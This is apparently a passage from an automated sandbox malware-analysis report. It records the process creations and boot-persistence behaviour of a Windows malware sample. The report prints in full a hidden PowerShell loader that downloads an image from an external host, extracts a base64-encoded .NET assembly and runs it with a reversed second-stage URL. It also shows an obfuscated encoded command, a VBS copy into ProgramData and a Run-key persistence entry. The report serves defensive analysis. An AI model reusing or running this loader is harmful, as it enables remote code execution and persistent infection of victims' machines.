QBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTre
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820', 'https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.irpawx/rorre/moc.seporrehtnap//:sptth' , '1' , 'C:\ProgramData\' , 'Name_File','RegAsm',''))} }"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\Name_File.vbs
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMQDgTrevDgTreDUDgTreNDgTreDgTreyDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreMwDgTre5DgTreDQDgTreODgTreDgTreyDgTreDDgTreDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820', 'https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.irpawx/rorre/moc.seporrehtnap//:sptth' , '1' , 'C:\ProgramData\' , 'Name_File','RegAsm',''))} }"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\Name_File.vbsJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848940998 push E95B71D0h; ret 2_2_00007FF8489409C9

            Boot Survival

            barindex
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Path C:\ProgramData\Name_File.vbsJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run PathJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run PathJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
